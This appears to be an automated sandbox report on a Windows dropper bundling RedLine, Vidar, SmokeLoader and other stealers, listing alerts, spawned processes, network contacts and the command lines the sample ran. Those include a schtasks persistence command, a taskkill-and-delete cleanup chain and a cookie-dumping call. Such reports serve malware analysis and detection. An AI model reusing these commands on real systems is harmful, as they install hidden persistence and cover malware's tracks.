Malware Analysis Report

2025-01-02 15:46

Sample ID 210722-7f39811rfn
Target 7E03737D683BC19280A5DC25BEFC85B6.exe
SHA256 7d307d58ea8702aa1600cb785125936c0c6643f8e892b789d633105ba246c449
Tags
redline smokeloader vidar 933 build2 aspackv2 backdoor infostealer stealer suricata trojan socelars ani miner persistence upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

7d307d58ea8702aa1600cb785125936c0c6643f8e892b789d633105ba246c449

Threat Level: Known bad

The file 7E03737D683BC19280A5DC25BEFC85B6.exe was found to be: Known bad.

Malicious Activity Summary

redline smokeloader vidar 933 build2 aspackv2 backdoor infostealer stealer suricata trojan socelars ani miner persistence upx

Process spawned unexpected child process

Socelars

Socelars Payload

Vidar

suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

SmokeLoader

suricata: ET MALWARE GCleaner Downloader Activity M1

RedLine

suricata: ET MALWARE Win32/Ficker Stealer Activity M3

RedLine Payload

Vidar Stealer

Executes dropped EXE

Downloads MZ/PE file

ASPack v2.12-2.42

UPX packed file

Loads dropped DLL

Cryptocurrency Miner

Adds Run key to start application

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Enumerates physical storage devices

Program crash

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: MapViewOfSection

Suspicious use of WriteProcessMemory

Kills process with taskkill

Checks SCSI registry key(s)

Creates scheduled task(s)

Delays execution with timeout.exe

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2021-07-22 23:31

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2021-07-22 23:31

Reported

2021-07-22 23:33

Platform

win7v20210408

Max time kernel

15s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\7E03737D683BC19280A5DC25BEFC85B6.exe"

Signatures

RedLine

infostealer redline

RedLine Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Vidar

stealer vidar

suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

suricata

suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

suricata

Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7E03737D683BC19280A5DC25BEFC85B6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7E03737D683BC19280A5DC25BEFC85B6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7E03737D683BC19280A5DC25BEFC85B6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_3.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_2.exe N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_2.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_2.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_2.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_5.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1348 wrote to memory of 1176 N/A C:\Users\Admin\AppData\Local\Temp\7E03737D683BC19280A5DC25BEFC85B6.exe C:\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe
PID 1348 wrote to memory of 1176 N/A C:\Users\Admin\AppData\Local\Temp\7E03737D683BC19280A5DC25BEFC85B6.exe C:\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe
PID 1348 wrote to memory of 1176 N/A C:\Users\Admin\AppData\Local\Temp\7E03737D683BC19280A5DC25BEFC85B6.exe C:\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe
PID 1348 wrote to memory of 1176 N/A C:\Users\Admin\AppData\Local\Temp\7E03737D683BC19280A5DC25BEFC85B6.exe C:\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe
PID 1348 wrote to memory of 1176 N/A C:\Users\Admin\AppData\Local\Temp\7E03737D683BC19280A5DC25BEFC85B6.exe C:\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe
PID 1348 wrote to memory of 1176 N/A C:\Users\Admin\AppData\Local\Temp\7E03737D683BC19280A5DC25BEFC85B6.exe C:\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe
PID 1348 wrote to memory of 1176 N/A C:\Users\Admin\AppData\Local\Temp\7E03737D683BC19280A5DC25BEFC85B6.exe C:\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe
PID 1176 wrote to memory of 1344 N/A C:\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1176 wrote to memory of 1344 N/A C:\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1176 wrote to memory of 1344 N/A C:\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1176 wrote to memory of 1344 N/A C:\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1176 wrote to memory of 1344 N/A C:\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1176 wrote to memory of 1344 N/A C:\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1176 wrote to memory of 1344 N/A C:\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1176 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1176 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1176 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1176 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1176 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1176 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1176 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1176 wrote to memory of 1048 N/A C:\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1176 wrote to memory of 1048 N/A C:\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1176 wrote to memory of 1048 N/A C:\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1176 wrote to memory of 1048 N/A C:\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1176 wrote to memory of 1048 N/A C:\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1176 wrote to memory of 1048 N/A C:\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1176 wrote to memory of 1048 N/A C:\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1176 wrote to memory of 1060 N/A C:\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1176 wrote to memory of 1060 N/A C:\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1176 wrote to memory of 1060 N/A C:\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1176 wrote to memory of 1060 N/A C:\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1176 wrote to memory of 1060 N/A C:\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1176 wrote to memory of 1060 N/A C:\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1176 wrote to memory of 1060 N/A C:\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1176 wrote to memory of 632 N/A C:\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1176 wrote to memory of 632 N/A C:\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1176 wrote to memory of 632 N/A C:\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1176 wrote to memory of 632 N/A C:\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1176 wrote to memory of 632 N/A C:\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1176 wrote to memory of 632 N/A C:\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1176 wrote to memory of 632 N/A C:\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1176 wrote to memory of 1456 N/A C:\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1176 wrote to memory of 1456 N/A C:\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1176 wrote to memory of 1456 N/A C:\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1176 wrote to memory of 1456 N/A C:\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1176 wrote to memory of 1456 N/A C:\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1176 wrote to memory of 1456 N/A C:\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1176 wrote to memory of 1456 N/A C:\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1176 wrote to memory of 1420 N/A C:\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1176 wrote to memory of 1420 N/A C:\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1176 wrote to memory of 1420 N/A C:\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1176 wrote to memory of 1420 N/A C:\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1176 wrote to memory of 1420 N/A C:\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1176 wrote to memory of 1420 N/A C:\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1176 wrote to memory of 1420 N/A C:\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 836 wrote to memory of 1536 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_2.exe
PID 836 wrote to memory of 1536 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_2.exe
PID 836 wrote to memory of 1536 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_2.exe
PID 836 wrote to memory of 1536 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_2.exe
PID 836 wrote to memory of 1536 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_2.exe
PID 836 wrote to memory of 1536 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_2.exe
PID 836 wrote to memory of 1536 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_2.exe
PID 1060 wrote to memory of 640 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_4.exe

Processes

C:\Users\Admin\AppData\Local\Temp\7E03737D683BC19280A5DC25BEFC85B6.exe

"C:\Users\Admin\AppData\Local\Temp\7E03737D683BC19280A5DC25BEFC85B6.exe"

C:\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sonia_1.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sonia_2.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sonia_3.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sonia_4.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sonia_5.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sonia_6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sonia_7.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sonia_8.exe

C:\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_3.exe

sonia_3.exe

C:\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_5.exe

sonia_5.exe

C:\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_8.exe

sonia_8.exe

C:\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_7.exe

sonia_7.exe

C:\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_1.exe

sonia_1.exe

C:\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_2.exe

sonia_2.exe

C:\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_4.exe

sonia_4.exe

C:\Users\Admin\AppData\Local\Temp\Chrome2.exe

"C:\Users\Admin\AppData\Local\Temp\Chrome2.exe"

C:\Users\Admin\AppData\Local\Temp\P1GlorySetp.exe

"C:\Users\Admin\AppData\Local\Temp\P1GlorySetp.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BIRZAC~1.EXE

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BIRZAC~1.EXE

C:\Users\Admin\AppData\Local\Temp\Install2.EXE

"C:\Users\Admin\AppData\Local\Temp\Install2.EXE"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "system64" /tr '"C:\Users\Admin\AppData\Roaming\system64.exe"' & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "system64" /tr '"C:\Users\Admin\AppData\Roaming\system64.exe"'

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BIRZAC~1.EXE

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BIRZAC~1.EXE

C:\Users\Admin\AppData\Roaming\system64.exe

"C:\Users\Admin\AppData\Roaming\system64.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BIRZAC~1.EXE

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BIRZAC~1.EXE

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "system64" /tr '"C:\Users\Admin\AppData\Roaming\system64.exe"' & exit

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD2~1.EXE

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD2~1.EXE

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "system64" /tr '"C:\Users\Admin\AppData\Roaming\system64.exe"'

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\7zS1C76.tmp\Install.cmd" "

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/1Df2r7

C:\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_6.exe

sonia_6.exe

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2156 CREDAT:275457 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im sonia_3.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_3.exe" & del C:\ProgramData\*.dll & exit

C:\Windows\SysWOW64\taskkill.exe

taskkill /im sonia_3.exe /f

C:\Users\Admin\Documents\me4HyvW74QPkW5CTxdLrPYCE.exe

"C:\Users\Admin\Documents\me4HyvW74QPkW5CTxdLrPYCE.exe"

C:\Users\Admin\Documents\JiIhuE2aeHPXQC1TBgGqPrRe.exe

"C:\Users\Admin\Documents\JiIhuE2aeHPXQC1TBgGqPrRe.exe"

C:\Users\Admin\Documents\xpb4CCxssxwBWF_0BV0A2_7s.exe

"C:\Users\Admin\Documents\xpb4CCxssxwBWF_0BV0A2_7s.exe"

C:\Users\Admin\Documents\YtengLF1TxOE1DGRbJwVTVVh.exe

"C:\Users\Admin\Documents\YtengLF1TxOE1DGRbJwVTVVh.exe"

C:\Users\Admin\Documents\7844e8syRVQtIgQ_jRcbiAfV.exe

"C:\Users\Admin\Documents\7844e8syRVQtIgQ_jRcbiAfV.exe"

C:\Users\Admin\Documents\sm6zeEcSzIru1cQiXT2OvnYl.exe

"C:\Users\Admin\Documents\sm6zeEcSzIru1cQiXT2OvnYl.exe"

C:\Users\Admin\Documents\J_q0QK5EeayHdL_1uG1EvYY1.exe

"C:\Users\Admin\Documents\J_q0QK5EeayHdL_1uG1EvYY1.exe"

C:\Users\Admin\Documents\O9j7WkZyvgdRdwQm5ZBbRnEv.exe

"C:\Users\Admin\Documents\O9j7WkZyvgdRdwQm5ZBbRnEv.exe"

C:\Users\Admin\Documents\EYXoLzttpwauSuAEFA4P_QpF.exe

"C:\Users\Admin\Documents\EYXoLzttpwauSuAEFA4P_QpF.exe"

C:\Users\Admin\Documents\RByJyGOr81o74VPkNlUVXzrZ.exe

"C:\Users\Admin\Documents\RByJyGOr81o74VPkNlUVXzrZ.exe"

C:\Users\Admin\Documents\tXaDC7Mf9S4CWJXctSx5X4jq.exe

"C:\Users\Admin\Documents\tXaDC7Mf9S4CWJXctSx5X4jq.exe"

C:\Users\Admin\Documents\3AeguyJ_N3Rox0yrvFLG3ugQ.exe

"C:\Users\Admin\Documents\3AeguyJ_N3Rox0yrvFLG3ugQ.exe"

C:\Users\Admin\Documents\6j8Mb2LImEI9Gyja0Lomsxfz.exe

"C:\Users\Admin\Documents\6j8Mb2LImEI9Gyja0Lomsxfz.exe"

C:\Users\Admin\Documents\pOeTwm0qtF3qUKbidKMU4Ouj.exe

"C:\Users\Admin\Documents\pOeTwm0qtF3qUKbidKMU4Ouj.exe"

C:\Users\Admin\Documents\7YcPYG6UYI1WjUYMHrmsAPWR.exe

"C:\Users\Admin\Documents\7YcPYG6UYI1WjUYMHrmsAPWR.exe"

C:\Users\Admin\Documents\Dsg12OO1nljdVJwp877ogvSQ.exe

"C:\Users\Admin\Documents\Dsg12OO1nljdVJwp877ogvSQ.exe"

C:\Users\Admin\Documents\tMeZ4LJLMgQI2y2ExwxYgFDE.exe

"C:\Users\Admin\Documents\tMeZ4LJLMgQI2y2ExwxYgFDE.exe"

C:\Users\Admin\Documents\i4sYt1TLtxo7DKvkT1e4YHpl.exe

"C:\Users\Admin\Documents\i4sYt1TLtxo7DKvkT1e4YHpl.exe"

C:\Users\Admin\Documents\8hsO_3a9Rywuc1shfv6VvMEP.exe

"C:\Users\Admin\Documents\8hsO_3a9Rywuc1shfv6VvMEP.exe"

C:\Users\Admin\Documents\3AeguyJ_N3Rox0yrvFLG3ugQ.exe

C:\Users\Admin\Documents\3AeguyJ_N3Rox0yrvFLG3ugQ.exe

C:\Windows\SysWOW64\timeout.exe

timeout /t 6

C:\Users\Admin\Documents\3AeguyJ_N3Rox0yrvFLG3ugQ.exe

C:\Users\Admin\Documents\3AeguyJ_N3Rox0yrvFLG3ugQ.exe

C:\Users\Admin\Documents\3AeguyJ_N3Rox0yrvFLG3ugQ.exe

C:\Users\Admin\Documents\3AeguyJ_N3Rox0yrvFLG3ugQ.exe

C:\Users\Admin\Documents\3AeguyJ_N3Rox0yrvFLG3ugQ.exe

C:\Users\Admin\Documents\3AeguyJ_N3Rox0yrvFLG3ugQ.exe

Network

Country Destination Domain Proto
N/A 8.8.8.8:53 sokiran.xyz udp
N/A 172.67.186.105:80 sokiran.xyz tcp
N/A 8.8.8.8:53 music-s.xyz udp
N/A 8.8.8.8:53 iplogger.org udp
N/A 88.99.66.31:443 iplogger.org tcp
N/A 88.99.66.31:443 iplogger.org tcp
N/A 8.8.8.8:53 shpak125.tumblr.com udp
N/A 74.114.154.18:443 shpak125.tumblr.com tcp
N/A 8.8.8.8:53 ip-api.com udp
N/A 208.95.112.1:80 ip-api.com tcp
N/A 88.99.66.31:443 iplogger.org tcp
N/A 8.8.8.8:53 www.facebook.com udp
N/A 157.240.196.35:443 www.facebook.com tcp
N/A 116.202.183.50:80 116.202.183.50 tcp
N/A 8.8.8.8:53 ipinfo.io udp
N/A 34.117.59.81:443 ipinfo.io tcp
N/A 8.8.8.8:53 pki.goog udp
N/A 216.239.32.29:80 pki.goog tcp
N/A 37.0.8.235:80 37.0.8.235 tcp
N/A 37.0.11.41:80 37.0.11.41 tcp
N/A 136.144.41.201:80 136.144.41.201 tcp
N/A 136.144.41.201:80 136.144.41.201 tcp
N/A 185.20.227.194:80 185.20.227.194 tcp
N/A 8.8.8.8:53 cdn.discordapp.com udp
N/A 162.159.133.233:80 cdn.discordapp.com tcp
N/A 162.159.133.233:80 cdn.discordapp.com tcp
N/A 162.159.133.233:80 cdn.discordapp.com tcp
N/A 162.159.133.233:80 cdn.discordapp.com tcp
N/A 162.159.133.233:80 cdn.discordapp.com tcp
N/A 162.159.133.233:80 cdn.discordapp.com tcp
N/A 162.159.133.233:80 cdn.discordapp.com tcp
N/A 162.159.133.233:80 cdn.discordapp.com tcp
N/A 162.159.133.233:80 cdn.discordapp.com tcp
N/A 162.159.133.233:80 cdn.discordapp.com tcp
N/A 162.159.133.233:80 cdn.discordapp.com tcp
N/A 162.159.133.233:80 cdn.discordapp.com tcp
N/A 162.159.133.233:80 cdn.discordapp.com tcp
N/A 162.159.133.233:80 cdn.discordapp.com tcp
N/A 162.159.133.233:80 cdn.discordapp.com tcp
N/A 162.159.133.233:80 cdn.discordapp.com tcp
N/A 162.159.133.233:80 cdn.discordapp.com tcp
N/A 162.159.133.233:80 cdn.discordapp.com tcp
N/A 162.159.133.233:80 cdn.discordapp.com tcp
N/A 162.159.133.233:80 cdn.discordapp.com tcp
N/A 162.159.133.233:80 cdn.discordapp.com tcp
N/A 162.159.133.233:80 cdn.discordapp.com tcp
N/A 162.159.133.233:80 cdn.discordapp.com tcp
N/A 162.159.133.233:80 cdn.discordapp.com tcp
N/A 162.159.133.233:80 cdn.discordapp.com tcp
N/A 162.159.133.233:80 cdn.discordapp.com tcp
N/A 162.159.133.233:80 cdn.discordapp.com tcp
N/A 162.159.133.233:80 cdn.discordapp.com tcp
N/A 162.159.133.233:80 cdn.discordapp.com tcp
N/A 162.159.133.233:80 cdn.discordapp.com tcp
N/A 162.159.133.233:80 cdn.discordapp.com tcp
N/A 162.159.133.233:80 cdn.discordapp.com tcp
N/A 162.159.133.233:80 cdn.discordapp.com tcp
N/A 162.159.133.233:80 cdn.discordapp.com tcp
N/A 162.159.133.233:80 cdn.discordapp.com tcp
N/A 162.159.133.233:80 cdn.discordapp.com tcp
N/A 162.159.133.233:80 cdn.discordapp.com tcp
